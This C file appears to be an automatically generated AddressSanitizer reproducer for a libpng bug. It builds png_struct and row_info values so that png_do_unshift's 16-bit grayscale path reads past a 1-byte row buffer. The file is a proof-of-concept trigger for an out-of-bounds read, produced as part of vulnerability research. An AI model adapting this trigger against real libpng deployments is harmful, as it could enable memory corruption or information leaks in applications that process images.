/*
 * Standalone reproducer — build with ASan.
 * Generated by SAILOR (concrete_verify.py).
 */
#include "harness_types.h"
#include <stdlib.h>
#include <string.h>

int main() {
    // Allocate structs concretely
    png_struct *png_ptr = (png_struct*)calloc(1, sizeof(png_struct));
    png_row_info *row_info = (png_row_info*)calloc(1, sizeof(png_row_info));

    // Set row_info to hit the vulnerable 16-bit case with a needed shift
    row_info->bit_depth = 16;            // target switch case
    row_info->color_type = 0;            // grayscale (not PALETTE)
    row_info->rowbytes = 1;              // only 1 byte available -> bp[1] becomes OOB

    // Prepare sig_bits so have_shift != 0 for grayscale path
    png_ptr->sig_bit.gray = 8;           // shift = 16 - 8 = 8

    // Provide a 1-byte row buffer (concrete size) and make its content symbolic
    png_ptr->row_buf = (png_byte*)malloc(1);
    memset(png_ptr->row_buf, 0xAA, 1);

    // Flags/transformations are irrelevant due to neutralized entry, but initialize anyway
    png_ptr->flags = 0;
    png_ptr->transformations = 0;

    // Call the entry function (neutralized to direct-call png_do_unshift)
    png_do_read_transformations(png_ptr, row_info);

    return 0;
}
